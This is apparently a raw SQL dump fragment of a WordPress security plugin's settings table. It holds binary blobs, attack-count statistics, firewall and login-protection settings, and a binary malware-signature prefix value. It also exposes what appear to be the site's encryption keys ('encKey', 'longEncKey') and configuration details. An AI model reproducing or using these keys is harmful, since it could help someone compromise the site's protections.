u�J0f�j\0ց�s��ZR�~�]���*����\"�rd��S�2�!�{�֣:=�Nz����g�&��$�F,�lK급/Í9�z�Üu��\Z\"�dm�*\Z���X�͹[I|�4r�_�xS����*t����^�&��/�\\$����r\\`ʳa���7%��eűCS6���ǀ�h�2.^W�w��H�î4����n�~2p{wq\Z.(�W�a�_N��C���n�d,y�p��U�~���2ʩ��w�:���jU�/��t#L���\"u�t��P�w\"��L�x|�(.ay�ѫu�#\Z�ڄe���u��uI�;o���,1�{��[rѸ5�b�,���B2��+Y�GH�Q�M��p+��i��2�vC����m��*�i���QLC�H8�RvJ��j��o���޼f2RFt���	{[O��b�4���?���fs^�Y��\0�������^���x�{��N�0Gu�D/�S���ā����;��%�mp2X[�j_aG�����v�@�2��b\\��\0����~*J�jT�\Zw�?/�c�g��)e�����Z~&�q��N7�� Z-�����r��$E�\Z3b\n���NyoH�N�mQ��va�N�/	�Y�!v�46]3�]��3�<���ڗ���<�*=�t󅡢pE�KL����[�Mrx%\0�b0qq�Ă��|x����:��_��V�5:�U��S�o2ҾP�u�A_�*}�~��\'K9�;�4��p���\n+=U�O�}��6Ԋ|���}<yﭼ։K�hxޫ(R���1�=~�P�w���ºT�+�In��\r{��M��_�໘`3x���4��L�#\\r��ԹF� \"�$q�c�@\n��C��KnA��O] �`�o���C��K�����.���U8u���i���H<pSh�Zذ/�\r.�O�}9�fP�k���o��2,�=A}P��#\r5�k��,P�D�+�>J��5딧�n���.\0U�Rq�k\'�����i_i,�\n�G��+L�.\rQ�\0��%�\'�y�m�_��#�?���E1\0�² �7��5mw>Z��2Q2K=�^N����q����Q\n�IS�}V#�N7=��ɷ�5���gD��>h]3��\n�0_�э�Wg��1*�V�����FIP���x��f�vL�@���p����R;K�����R��[:[��*w�(�1�� y��jL3ˇ�d�\'��V&}l��]dO��g��V��:���5��fH��A~l!�/�6�yԶ��!��[^�I�ٷO3��E�}{��Y�z������#���@���XaͰ]��()c�k��!~s�~h���q0���X?8�̅���H��i,+x��͵�SE��9�r=�#_~�\\�/Sͻ�(YC/#/�D��^>�6\\����V�6 E�i�*�X,��/�6������}%]�v�	��\ZY����<�}]�8�c��4=}�X�j(	;��w�g�ָ,\\R�0�$k�o�A��{������2#�am��\'��Y#��O��(&\r\n0�{z����7�j����R�v���^0�?�2Dh�4�SG�8RH�e���4ډ3�z\Zr�K,�Iޗ�Oe�x�џ��i}��.��kQ�_�3��9�y\n�b�-5c,R����3���\'�r��.]9c�x��ߚY9�\\~������f���Ƕh�j}u�pIX�p�ھΩT����/�6�F���k�T�E�;�H	#�ߛ���{�C\'Vۨ/��H_n{��FW��?^ծ�V��� �N	��-���j���s\Zjh߽C�ș�I��E�R���1��G�Ÿċ��d/8��Z{{�S�*Q�b�U�a����9e׽R��X�?楐�1���ih\Z�ҕ��X�T�9�����Eߎ�i��ц	�v���&�=G���V�kr2��C5����m��~q~���;rfXᅸ��eX�t�Ū.+[�����咩H{v���./s|U�Z��A�h$DU�s����I�{\'\01�������r���k��D����a�c���#k�Qbm(��(��{ia^�\\v�J��M��C�`QA6�_�~�j�c�,1��F\n)7��䩾!�@���	�n���K^$��N�Vj���q��`J�BZ�ޅ�J���X�0u�9�>�!��v1����v��ą�>���Ш�&�D�6X]`��=�s\0��1�y5z���4�O�š|p�A5�P���(fy���2��Э�9��ex�kz�B��4��6�Hy�/=��u4�_c���	ο\'���M|4��gE;+\\�)H�q��{�@�dX{a2�H�=���G��6Cm��:�|��!%��p8�Ug𿌫��A�N��y�qoʅ#&]�#mV�ە�rȹ���L�=��6m�zQh��Z������C�� ���T�α���i��ߠPom\\D5~�!�������o��a[�ce�U�>T��ø�~3��$:�З���e���W�_6|�T-�>{�rC\n�=���k��Rd�j��6���T������\'����3H�_cx��N���pn��x{V���@��f!��D.S��J/�xk�nZ�~q��6Lꂨ$����?{II%�&���V(Aw��<䩻���c�$�a�=�����!3C�PY��.c%�0b?O�)Mퟴ����[�%>xd�]?Z�񴝞1����5���q�)��9W/`��kW�V*�_i_\'h�Ma�CQW�~K�0�X~D�<���>�5�O!	U\'���IaӴ9+���6��fF��7�r,��?��O�P��\Z�r�(ga�u;Y�R�>�v\\��?s�k�\\� �~�m���V��|ݐ�\0��!��ٖX6���a�v�/%1U�Ed��_w\'�ޢ���KGs�*<v�u.������S��A`\n�	t���p\'��\\ˑ+&�*u4��c	\Z{\r�������@l(2�u���-V�����Jˀ��z�ا`*#��j�xZ��&�\Z�{C\rB�]���Y�#�<\0!_�M~(�����k��_�M��W��F�i�]������iˍ��B��l@��j�!�\0@�����Ų�3����pv`�r9H��(�c�WޏK\"�$��G�ϭ\'�6�I�\"�V�ɜ=��0������\Z����h݆֭<e1L�!ӳ��\Z��D�K��i��@*S�ĘRg���	r���z�2,o��Q���ϕ�FU���lt��*�g����V☲ù�����۬��Bj�LN��hZ��e%�D\'��G}w���E�k*	��W،j��|���K\'��l�Ȉ<������fdU�Ƭ����\\�fH���v��I�I��w�d�4\"�醗����0_��h�^1���-�c�j�Htfݬ�?���D)�\'��hcF,�4�|i�Ql�p��t�>�%y����1P�bB��R�����[B}�\n[���;	I2q�U�>�n)̈́��Ix��VV$��Z=��q�UO���c����\n���4�\r\'R�2�8�F(>F�2 ����\"Qj6�h��\'�Vh��~��Ad���7��D�c���A�\Z�H�zy�I����Q�]�o��%<��DN�N��M�^�^��/jC9�tb��p�\r<�!!d�e�p��\Z�	�0mz�����%�\ZN���:�J0��L��2��\"L��⯜t�%>��:1��W��R����ͩ��Q�i��~�^G�vr�`G�̃�S������$ �2|��>��Y�wM�W[�� ��I��/�H-j\r%�D��������+�P4�g.���{���^W��/!u����T �&gɖ�\r.��:�)�Q��7�ݣ� �h��\"b�Y(V��W�|/5[�r�ɷ*���M���l���r���n��zW��m:f�O&y(�H������\n�#_F�D:���1I�}U\"\0H�B�&`�8��m��!U�c%rT����.��q�x���=\0���\"�I�8c�_�;�k�6��R�r��E?{d���G_�A���7����c0+��^E��h1��{��9U�,���%k1X�\r Lc�N�;�<K�{�*�k�L������E,�t*�J�.	���*歁\\5��c�%�a��P�T��g�xȻ�=��|@� ԃ��\\��HVq2��v5�o��,�\0�7�IѴ�E�����90.BAe�4>�]y�S�Pk��=�9i��fCu	l6E�#�Zt,#<�\ZL�4Z���FU����!}\\֊��_ȕ��o�/B�\\!�Z<&�^�S���V�?���R�Ê�]��	���ͮ6���R��Ԥz��8�\\4��w��c���y����s���M�)9@����2���.���V�/B��c5a��\rRI�G>?���y;�+�����\'�SAE�D>����qqa�_��؈K)�A��/��YQ��;�#�6�yc�Ȍ�ʗ�j���L�2��-[� 3���]S���.��\\��0ה��B/\n�j�z\'a�����������F�L\Z�H-L	`$p1/>:r���V�Ǚ=={��Or�R�xg�J9G0>z�c&�IÆb4~�*L�Q�Rkg!i��f�nb.*��η���$�gw�T��#;?��`�?��;\"��A�Y|���X;u�a�w?oa���bN$��gI���+���R.�e�\Z����pt��ᣈ��:\Z�`\'8�y`���w�W�0���P��R�Ƈ��]�P�d��$*H��9\n?�g{��gs�	gO��X�I�#n���!F#Yȼv\"|�:�ݯCG#\nY�E[��V�w��i�%�-%F�\0��[�n�1S�a���+���]��B�E2�s�Ŏ)�?ԟ��B�	�*�Z�O��ےn+�z�`ߗ��]�^��$�d�g��Gf���m�G8�@~n��?�	x��*Ցx�k��S��략9�����U�R�ݼ\"�EI� {�`z��$��쨀q���Z6hֲC��R=�8H��ΐ��<���>�y��y�=� �؃��G��ө&����0��*����u�\0u�\r��+M\nMƿ�4��f�_�MG���%2q��0�/ғ:;��e�W�G��ʈ�P��,�K��A]H��%����A��Q�D�۞V蚹xRBBy%�h�Wv��Ƕm�}n�G>p��ѹ��W�����5�w���O�E�̾�m�G��. Ճ�g��?ƒ�r�Тjs$_�D&֗��H��᝭s%��v�x-���#����?	���T���5�)�\\Np�����[��>��&��]����:���.�ѥׇ���4���U���hnl���h��ʫ�jF�**\Z���W�nfrP#3�w֢$����¡桘3���D�\\�[�I�����wD�=O$l\Z�����I��9<��0ox�>��L1��\Z?���f�]��t2Ј���5�����I�v��C�(�߱wzi��C\038�\'U���$�S��(�]4�P�����cU�v�᢭�(�c�̈́ɯ�Tνڐ$_����S����Њ�|��|���n��D��~��v-�;&���W�0��;��7�\"�L~ޅ�LE�`!�)l�ʛ�hL��O�/̩3��z4�Κ�C:Ufz^^Gn����/�pR1�C�̬20�2�J�΍<��:�_��B!s*���l���6���\"Q_�ȹ�2���a7��<\\U}�\"A���s��?��C9����`�r���0É�����\0��1��y�i�N7,N]�8�Ϫ��������C�,01�Sͭ�-�a��b���pY�x{Vc�o��lNG�qlkb�����a��ñԟ�yb��@�Y���(J5}׸d�t`Mu���Ƃ�Uz[�w\\=ʼ\0[\nK�ix�-b>��,E�d�Ҕ�\nN�-���\0�9�pM0+��~0��:6r½c��	��h{�M\\����J��,�k\r?��O\Z/ކf���?�xȃ9��\rQP@\r��\Z���S�z�\n��E�O����wF.P��)n>��<���W��S)���_�]����Y�a�\'kY����_ot�r�)��C����E�I�m/�;����g�g�ŭ��Ʊ��0`���8^���\\��Ƌ�~���~�J��7$kSsYme(�|��.��ŹzZ��[����몾l�c�읋���q�oן���K�֛+���%�؂�!a�29\n����`�F_h��*�y��.�Z�ۭP�0��\"��j����=xat\\K��h���9����wǏ���;Z)���K�~���Q�[::��j�s���^Z@2n��ve)e_��u���!�9�]�we<���΁�iJkN���uM��ٍ��O�I0x{M�y�R\r�~��S���BST����h�Zs�*����[?	PO��v��DŌi*�b���*�;ةD�ڨ�n�/N����sh�w��k1]�\':�&e�t��b�t��*�\n\'�Z%��$^���*�B��R_~�;A���k8����\\=�>J����1�~(���Ac�q�o%TF�O-�Gz�JTN>�\'����#.�D�=����a�:��\'j�K�� WHS����`\r�y~E�~|�\nR�i)fl�饔e}�)ld�*�ÀI�F�^��ȯ�ܒ��W���@�~�ݘ�T�`�l�� �9��睪P�k�KV��d��*�X\0M�o��DO=h�W��\0 �7$����R�T�b��z�Hp�f��?�@јݲ�I�����G�]�q�M;��>l\nA���>��k�h���R���8�yO��t�ld�U�^��E�%O��n޹�~}���J[�An>���P:�����7��4iw����q��c�s� @�\"/��š|sP|0��ô����!�J��[h7e�^�J��T�u�V��څ�6���bJ�R�#��Բ�Yu�n�nO�������#�\r�F1_Ң\'�Sz�<�J8�@�b��c�\niz�N�y׊��}˜.��\Z�^�����*�̶=������.�)~��	�_OP�\n�x+��U��1�w��z�)�\"4�+�B\\���II�%�%�\"ЖX����~X4;;�]*�	�&���\"T�QWvRi��d�3�m�`a��3\r�45q$�&Β9QO*z�kB�������jdE,�Tg�OrP~�tgn�g���(�W�{v����^�Z��}ȐC6ݞ��+�?�۸Z�P�d?P�\\����kO��}H�\"F�+:̵LZ�KA�x����r�^/���\'�D�~�4�d���`8`q��׆dŪC*�k]�0ɾ\"���Ͷ#8K���r���|\Z�ゐ5�b�T2���ph=��������j�#�jR����	𪏨�|�z��03��ܸOV1�SlfwV��1	��l?��.\r��ƨ�;p���-�e*���`���[�p5U���ͳ���{���n���!z[�>�f�t4����s^�tE+W�L�կ��C��ҩχH�h�Z;P��.����s.��1��q�+܋\r�4�$Pd�uU1����8���<Kn�s���p�GR�b�:L��0�j}�y�슟W���Sh�5GH�;�V��(��(�\ZB\0�\r�lŗ���B�s�#3�?+��Wp�P�M�k]�<px_�\"R�Lki��G�Ap�\Z\\���?h��8���Q��$�d1��ˌ�GPP�(�Ϟ���S��3Q�?(H|,�;p��H@yƄ��k}�{��[��W{�LG�.�vOǫ�\"�M\r6Ic�����E��,M+,�ǖ��f�� �MP�[�Y&���\r��,���YDx��x����Vތ�\Z��~�VD���Z6�aW�_�tʩk�g�i\n�B�_��[�\0��7��4�w5���q��y����1�Щ3�&�Tt�ȹ��8��=��S�P�y�Ym���m��U�I���O�F	!������q��O�~þ`��Ϸ7�i.K���K�����;��3@��\"��_���d�/5�������%����9�U6>��Nc�V�M�Tp�W \r0�����Z|�\\�T�-��B�D\"�,Q�uܳ��n�����.������A\Z��X�m,��P\r�J�h��x�Q#��\0��tg���F���N���v��&�W\"�IJ�}:���k�S�-e&s�c��1h�ؗ]m3ĺXq�Ï��j�_�y�[+x�E��V0z���xi���\n���F�\n��7��4�欋\\�M�=���O����h������L;�-��F��\0��U��*/����d�.>z_�ME�MՏ-/v��_څc����?,U&��\"��R�[�R����|L���<uQR�V����x�s��	b[�y�i�C��\0����T�q@W~��{�Ṝg�IU9�\0���ڡSw�q�\\(LpR^��_m�o�<e��{�FE�P\n-����,5H��:��@���\r�%��-�����,$y��k�\\�3�딢ߓ{�B2�A����G�<��&%���߼w$���c�TV¶\r�|f�7hC�p\Z��8�w�G�+�dUx��Xc�ѨV�*�6�i(���H�Xw�6[�|�Ja�ʹ�Ж�q^����O�h;xA�3�-\r���hM�>kv7��[���ׇd�̂zR<��2���K�����7�I���I�!1&�j��[6����56i�8��n�t��l�*���?���/]�\Z�4�tX�*���5��2�.p�·�\"�F�6Zؙ\n��$z��z��\r�9`\\&S9�~{-LKŝI�T�i��;�u!���7�U�e�H> -��%G��(�m�\0���DO;��^�K��l����ظ!�/?aF�z��#�U�%f��{�x��i�<��f��;������K�Z9ްN��Wj_�H�]�͚V�I�R[냛�B�w�s��bN}�qY��7zo�U��u�\'���1��k���~P,o���ʂ-~�Bʾ�i>1�/#���#��y��X�oa��\\D�Şheb������h��?)�3��1�u��s��_s�Шd��>V�*R��/\0�����ӷ�~r�%�\"������8lb�κ��\"�7e�E�=n~��͙\'2�C/�����r�\r�̈�\r�;�J�U�ˑ-�\\B��?��	C�Q���c2 G������e��h��h��݌^�@�˶\\},n���ۛ~A�F�,���{�<n�н�>!��2��_U�d~��p��7O\";}���r\0','no'),('currentCronKey','','yes'),('dashboardData','a:4:{s:9:\"generated\";i:1631611536;s:3:\"tdf\";a:3:{s:9:\"community\";i:4325;s:7:\"premium\";i:4478;s:9:\"blacklist\";i:42244;}s:10:\"attackdata\";a:3:{s:3:\"24h\";a:24:{i:0;a:2:{s:1:\"t\";i:1631523600;s:1:\"c\";i:17174002;}i:1;a:2:{s:1:\"t\";i:1631527200;s:1:\"c\";i:15964303;}i:2;a:2:{s:1:\"t\";i:1631530800;s:1:\"c\";i:15988717;}i:3;a:2:{s:1:\"t\";i:1631534400;s:1:\"c\";i:16091924;}i:4;a:2:{s:1:\"t\";i:1631538000;s:1:\"c\";i:17995819;}i:5;a:2:{s:1:\"t\";i:1631541600;s:1:\"c\";i:18841121;}i:6;a:2:{s:1:\"t\";i:1631545200;s:1:\"c\";i:18246456;}i:7;a:2:{s:1:\"t\";i:1631548800;s:1:\"c\";i:17841005;}i:8;a:2:{s:1:\"t\";i:1631552400;s:1:\"c\";i:17826836;}i:9;a:2:{s:1:\"t\";i:1631556000;s:1:\"c\";i:12391527;}i:10;a:2:{s:1:\"t\";i:1631559600;s:1:\"c\";i:12144422;}i:11;a:2:{s:1:\"t\";i:1631563200;s:1:\"c\";i:12818597;}i:12;a:2:{s:1:\"t\";i:1631566800;s:1:\"c\";i:14127892;}i:13;a:2:{s:1:\"t\";i:1631570400;s:1:\"c\";i:13841511;}i:14;a:2:{s:1:\"t\";i:1631574000;s:1:\"c\";i:13984904;}i:15;a:2:{s:1:\"t\";i:1631577600;s:1:\"c\";i:13751067;}i:16;a:2:{s:1:\"t\";i:1631581200;s:1:\"c\";i:13466857;}i:17;a:2:{s:1:\"t\";i:1631584800;s:1:\"c\";i:13701926;}i:18;a:2:{s:1:\"t\";i:1631588400;s:1:\"c\";i:14404650;}i:19;a:2:{s:1:\"t\";i:1631592000;s:1:\"c\";i:14307159;}i:20;a:2:{s:1:\"t\";i:1631595600;s:1:\"c\";i:13978111;}i:21;a:2:{s:1:\"t\";i:1631599200;s:1:\"c\";i:14134630;}i:22;a:2:{s:1:\"t\";i:1631602800;s:1:\"c\";i:14600347;}i:23;a:2:{s:1:\"t\";i:1631606400;s:1:\"c\";i:18527922;}}s:2:\"7d\";a:7:{i:0;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459157675;}i:1;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495785895;}i:2;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433426486;}i:3;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367493055;}i:4;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431867926;}i:5;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429407758;}i:6;a:2:{s:1:\"t\";i:1631491200;s:1:\"c\";i:387507288;}}s:3:\"30d\";a:30:{i:0;a:2:{s:1:\"t\";i:1628985600;s:1:\"c\";i:340948082;}i:1;a:2:{s:1:\"t\";i:1629072000;s:1:\"c\";i:391301518;}i:2;a:2:{s:1:\"t\";i:1629158400;s:1:\"c\";i:344009428;}i:3;a:2:{s:1:\"t\";i:1629244800;s:1:\"c\";i:280104747;}i:4;a:2:{s:1:\"t\";i:1629331200;s:1:\"c\";i:333953666;}i:5;a:2:{s:1:\"t\";i:1629417600;s:1:\"c\";i:408475057;}i:6;a:2:{s:1:\"t\";i:1629504000;s:1:\"c\";i:385850425;}i:7;a:2:{s:1:\"t\";i:1629590400;s:1:\"c\";i:356787063;}i:8;a:2:{s:1:\"t\";i:1629676800;s:1:\"c\";i:377484616;}i:9;a:2:{s:1:\"t\";i:1629763200;s:1:\"c\";i:417695626;}i:10;a:2:{s:1:\"t\";i:1629849600;s:1:\"c\";i:418089950;}i:11;a:2:{s:1:\"t\";i:1629936000;s:1:\"c\";i:389900636;}i:12;a:2:{s:1:\"t\";i:1630022400;s:1:\"c\";i:408714415;}i:13;a:2:{s:1:\"t\";i:1630108800;s:1:\"c\";i:402826547;}i:14;a:2:{s:1:\"t\";i:1630195200;s:1:\"c\";i:469476643;}i:15;a:2:{s:1:\"t\";i:1630281600;s:1:\"c\";i:545447043;}i:16;a:2:{s:1:\"t\";i:1630368000;s:1:\"c\";i:481856165;}i:17;a:2:{s:1:\"t\";i:1630454400;s:1:\"c\";i:467802943;}i:18;a:2:{s:1:\"t\";i:1630540800;s:1:\"c\";i:380900128;}i:19;a:2:{s:1:\"t\";i:1630627200;s:1:\"c\";i:446597952;}i:20;a:2:{s:1:\"t\";i:1630713600;s:1:\"c\";i:523216388;}i:21;a:2:{s:1:\"t\";i:1630800000;s:1:\"c\";i:405505352;}i:22;a:2:{s:1:\"t\";i:1630886400;s:1:\"c\";i:467676683;}i:23;a:2:{s:1:\"t\";i:1630972800;s:1:\"c\";i:459157675;}i:24;a:2:{s:1:\"t\";i:1631059200;s:1:\"c\";i:495785895;}i:25;a:2:{s:1:\"t\";i:1631145600;s:1:\"c\";i:433426486;}i:26;a:2:{s:1:\"t\";i:1631232000;s:1:\"c\";i:367493055;}i:27;a:2:{s:1:\"t\";i:1631318400;s:1:\"c\";i:431867926;}i:28;a:2:{s:1:\"t\";i:1631404800;s:1:\"c\";i:429407758;}i:29;a:2:{s:1:\"t\";i:1631491200;s:1:\"c\";i:387507288;}}}s:9:\"countries\";a:1:{s:2:\"7d\";a:10:{i:0;a:2:{s:2:\"cd\";s:2:\"US\";s:2:\"ct\";i:1280485263;}i:1;a:2:{s:2:\"cd\";s:2:\"IN\";s:2:\"ct\";i:379162369;}i:2;a:2:{s:2:\"cd\";s:2:\"DE\";s:2:\"ct\";i:338527306;}i:3;a:2:{s:2:\"cd\";s:2:\"FR\";s:2:\"ct\";i:295620524;}i:4;a:2:{s:2:\"cd\";s:2:\"BR\";s:2:\"ct\";i:230040138;}i:5;a:2:{s:2:\"cd\";s:2:\"SG\";s:2:\"ct\";i:224701380;}i:6;a:2:{s:2:\"cd\";s:2:\"RU\";s:2:\"ct\";i:192406486;}i:7;a:2:{s:2:\"cd\";s:2:\"CN\";s:2:\"ct\";i:174430942;}i:8;a:2:{s:2:\"cd\";s:2:\"GB\";s:2:\"ct\";i:158632519;}i:9;a:2:{s:2:\"cd\";s:2:\"VN\";s:2:\"ct\";i:151237845;}}}}','yes'),('dbTest','a:1:{s:5:\"nonce\";s:64:\"767cc219a56740988151a25c67ef497867ef1f57924823ff24726385db4128ca\";}','no'),('dbVersion','10.5.11-MariaDB-1:10.5.11+maria~focal','yes'),('debugOn','0','yes'),('deleteTablesOnDeact','0','yes'),('detectProxyNextCheck','1632029426','no'),('detectProxyNonce','','no'),('detectProxyRecommendation','REMOTE_ADDR','no'),('diagnosticsWflogsRemovalHistory','[]','no'),('disableCodeExecutionUploads','0','yes'),('disableConfigCaching','0','yes'),('disableWAFIPBlocking','0','yes'),('dismissAutoPrependNotice','0','yes'),('displayAutomaticBlocks','1','yes'),('displayTopLevelBlocking','0','yes'),('displayTopLevelLiveTraffic','0','yes'),('displayTopLevelOptions','1','yes'),('emailedIssuesList','a:0:{}','yes'),('email_summary_dashboard_widget_enabled','1','yes'),('email_summary_enabled','1','yes'),('email_summary_excluded_directories','wp-content/cache,wp-content/wflogs','yes'),('email_summary_interval','weekly','yes'),('encKey','b09b2ddfc8d8315a','yes'),('fileContentsGSB6315Migration','1','yes'),('firewallEnabled','1','yes'),('geoIPVersionHash','e5ee69a4db1e318c2a1668873a8f5074012abb9852f5596fe3feaa8c07dac334','yes'),('howGetIPs','','yes'),('howGetIPs_trusted_proxies','','yes'),('isPaid','','yes'),('keyType','free','yes'),('lastAttackDataSendId','12602','yes'),('lastAttackDataSendTime','1631531459.061492','yes'),('lastBlockAggregation','1631615024','yes'),('lastBruteForceDataSendTime','1631609625.306100','yes'),('lastDailyCron','1631615023','yes'),('lastDashboardCheck','1631615023','yes'),('lastNotificationID','250','no'),('lastPermissionsTemplateCheck','1631615093','yes'),('lastScanCompleted','ok','yes'),('lastScanFailureType','','yes'),('lastScheduledScanStart','1631424613','yes'),('liveActivityPauseEnabled','1','yes'),('liveTrafficEnabled','0','yes'),('liveTraf_displayExpandedRecords','0','no'),('liveTraf_ignoreIPs','','yes'),('liveTraf_ignorePublishers','1','yes'),('liveTraf_ignoreUA','','yes'),('liveTraf_ignoreUsers','','yes'),('liveTraf_maxAge','30','yes'),('liveTraf_maxRows','2000','yes'),('loginSecurityEnabled','1','yes'),('loginSec_blockAdminReg','1','yes'),('loginSec_breachPasswds','admins','yes'),('loginSec_breachPasswds_enabled','1','yes'),('loginSec_countFailMins','240','yes'),('loginSec_disableApplicationPasswords','1','yes'),('loginSec_disableAuthorScan','1','yes'),('loginSec_disableOEmbedAuthor','0','yes'),('loginSec_enableSeparateTwoFactor','','yes'),('loginSec_lockInvalidUsers','0','yes'),('loginSec_lockoutMins','240','yes'),('loginSec_maskLoginErrors','1','yes'),('loginSec_maxFailures','20','yes'),('loginSec_maxForgotPasswd','20','yes'),('loginSec_requireAdminTwoFactor','0','yes'),('loginSec_strongPasswds','pubs','yes'),('loginSec_strongPasswds_enabled','1','yes'),('loginSec_userBlacklist','','yes'),('longEncKey','79f80b14abee58a1892d97f0a110dc8eae7d89faa4a4fa0af7a9d32e0fd3152e','yes'),('lowResourceScansEnabled','0','yes'),('lowResourceScanWaitStep','','yes'),('malwarePrefixes','�\0\0\0\0\0\0�y8�\0�ٗ�Ν;˽sIYJ��BR$RI%Q�D�ZHJ!I+�J��H����i!*)�EE+�&~����y�y��3��3>�nj�\no>^��\'�_wB�x�1�uO�\Z� �%�e\r�?�EC��)���M�>��8)��}��uׄ�-X����1ff��m\0��\0��\0�r�a?\0xG7\0?��)��`��\0�4��D�K@�bH�\0Y�+ gZ\0�p\Z������\0��@1�Pt���180�\0�v6���. �);����ռ\Z@U�	��{\0u���\'�����@p_���F��\\q4��\0Z.=���_��\r0h�����t&�:A��!��\0]�߀�\n@7�\0��b?�g��]����;�a�l`�,[�0�`��`x�,0�`00��a����$`d�0Z�U\\\0�>��K>��&�)���/��S5��)�;0����r��=	��7�?�����`\\C`9��*XXՐ���d`��~`�6L�XK�֗_�W�6$`�����t��t/�<$p�8�7�O�\0��`�m0m��.V!����kH,�\Z����H�f�~�x8�9�����u��6~����\\����\\�`��w�<�:`^s0��\0,?\0,H{\r,8�,(N\0\\Y\0,��x,�x�\0�cO�Ӏg�#`��-��u७xx�s��/�]�\0,�%|����l���0��,���Y���g�8`����р�����]���C��\'v\0�k܀\0�& `O,�:	X��&\"@`�H h�4 8Z��܁��s`��I�\Z0XӺٛ�A@XPv�/6\"�J b�\Z \"k\0X���:��\0����Q �U5d��DG]\06=]ln��X�[V�@�.�E�����$��������.�-�ض�,��; ~�j >��N�u灄��@B�#�8�H�7H|;؁.v����+�$� i�?�s� �+\n��	؍,v4{���f7�g�o`��>�w`��^`_�N`��R<�)A��=��q���R M�6�f0\nH�/\02�K�g; �c\"�9P�0%k��Ӣ���@��D g�= �3pdQ!p��4p�Y�����@�zs �����p�N\Z�\n��t_�T�p�[B�@��I�p�m���\Z��=(��n��1\Z�Y\Z{���{%\'F�|�\0�*^�&�������)���@��(�2(OR���˧���w&W��\0��`��m=P�2��@��k@�F�:�P}��|���7:������S�����[9Z�]�r�ә\0�5G�f6\0�|�}E$p��@�x�xx8�2���/��4h�txt��8S4�π�cÀ�Q��G������^@��6�y� �<xaj��\rxi9x9Y	��^���^Kږ�m�b൷=�:$x�1x;r�)Юc��\r���	|hK:�́O|�ϻu�/���o�����]��#�[�?�@��@�����=��\r��_��Ǿ��U�����7c\"�oN)0��K��K 4M��?�Ч� |�c�@ĺD���h�-�/1\'��q�ĝ��x��x6$/�E�.���8(Z;]�ˢ@��@k@��$P2�����[߀2�hP�u:H�D�T�3���@f�\'�{�� G��ܺP��\0U�AUR\0���������~P-�E���n8��Uj饁Z��Z�|A��M��~!��Uj?�j?{*�\r���:��A��-��vpp�)8D��W�Z;�������@W��h��84-zq	8l�0�p�4�N\r_[���\r�p?8�X����\Z}M\0�]A��;A��	����@�8����.8\Z\\��}�Z����� м��{*gp�b8��\0h9v>h��h�5����JN\0�����@k�h��\rh}��������lmN^m�A�oE��/�@;�~��U8i�?�>&��/\'?O\0�|D@�@\'pZ���z!�<�8=�]#~�3g�3�G�35\r��+G�Y�n�n����_A�����!8��X����yE������������\r�$%�!o=��=Ꟁ���g��p�\0��/��y�h�ApQ�\Z�K���:R.��.���n���烾��K=��G��K�T�k���e�W�d�+�OW|��7]W>����G0آ��4W]\0W�X	���{0���?^��X�uǀ�#߂�������!��M��u+>����o��Q>���3��F�4���\0�^5	�>�	F>n���\\]�< ��\r\np��Lp��+��Vf=�u�7�m�2p[�Wpۉ}�\'0nb�����\0����I�`’,p;�Ll��6��G��X)���&��\n&�?w}H����{{������=\0�߯�*S�x��-��e�`ڑ+`�r0�\r�>hxp�D0�[=���*p灇�^\0�R�lU�ݞ\0�\0s���1��c/����U`�\"3�8_R\n��̛�\0�5�������12� y6X��,��<�x��9���*XX�,��`�3%O���M�Y+s�<�&<��\r,60K�@��0<��0lX��e�3��J�B��0�+�.+�g������)7�gxy�E��\\��H��+��FE�W����o��?�E<���k�C���9u���5�����,���ޮ�o��wu�w�^�Ƹ������\'�����Р�	>\nj�\0}qw���=�`S�=�-�{(�\'o��i�$l���-#g����/����_�$�//Ԃ��+�W�?�����u\0��	�s�ߵ���z����{�^�C��ct<�1<\0�v�����m�ON�����s��ۧ�O/�� �����~�U��>}8��X	v�]�:��X\nv�{�D�{�N�?�1���b��o��2_�W�v�W���u6���\Z��#����?�࿲0����k;��W; ����47C���p� #���\n{�0\0�v�|���!�b9�.y� l����1��m#!r�\'��\Z\n��!ѼXH�%�:+!驫���[Hfɾ\\��SŐ��-D\ri���\'!���h�)1Rj/��w, ά��!�?H0�	VG!a�$��49� �wA��4_HG{��O\r��\r�t��<��{\r���˟�}����W���wo��@C��A�ܞA�|A�J�a�� Â+Ј�5��Yrh��#���\Z��\n2�%!�Fi-�F�F\'��L�4Bcd%И+ 3�dȜ\"���]��-��8�$Ȳp*dY�BV�@�\'�C,t �$dm�MX�� ��k �����E��rHQB�sS��iِ�hڪ����7ȹ�;���l�\0��\0M\'C�h��.�ճr]=r�r}��5*�=�$4O��_<	-��<�C �$�IxA�s]���4h��Bo3h�=Z4|=��+���Sȫv\'��y�ZCK<�AK��%ի!�!� �x��}����\Z ��� �7w����OfB+�\r@+ch垅�ʻá�o@+{C���P`�;h;Z5�Zդ�����\"h5�v7�V��B�/�Ck��\Z�PH�(t:��_����d�(��!��;�~�h�R	�,�	5�brnA��VB�+>A[��C[w|��,=�I$�03J�9\0%��\nm�j����Ў�(ɴJ��%m�/�%��\n%_�vM�\n�����q������OA)g_@)/ڠTq%t���V��O|\0L��	�\ne��A�fYP�(����9O�p�y(kH�k��CG8tdit���ȓ�(g��{�k	_�\r?~��ʷ̀�#G@�C�w�C\'�_�	���	�YЉ�[�����*�Z�j}	�B��CE�T�9*�>*�	Ag\n~CŊ�Pq�*�?*)̂JN�ι*�sw�C�cʠ�p�|�7t��T��2T�AW�A3��%/	t�	UM_U�q��n]]M�B�G�k	��k��C5��\r��P�Gts�c�L�X��9\0�i��:� ��:�׮ݏ�������z��j=��5n��\'BO�@����@��uPwj3���%Y�k�\r�z��M�z�mrԾ9z���q�����eԑiu�\nuz��:�ʠO�Z��~MЗ����oз�F��N��r��	u�������{_�ks��3zPoU�s�m�g�aWA<R�>�{п�l��F���a�4���q0�z�m�`��F��u�w���`�&�/Ä�r���܂I`L�������(�	����[KM�%\'��Kɰ�,\n���e�?a:*��_��F7`e�V���&0C�`N�s��`��˰��qXX��ΰ�t5,4�\Z�dX�Ck���:\"�u|&�:m��Px��}>���!����]��{�C�����0�<��6t>�<\0�4�\0���9\r�`�Ol\\k	�|��M�Y��^���$6w���h�-���V6k`��E�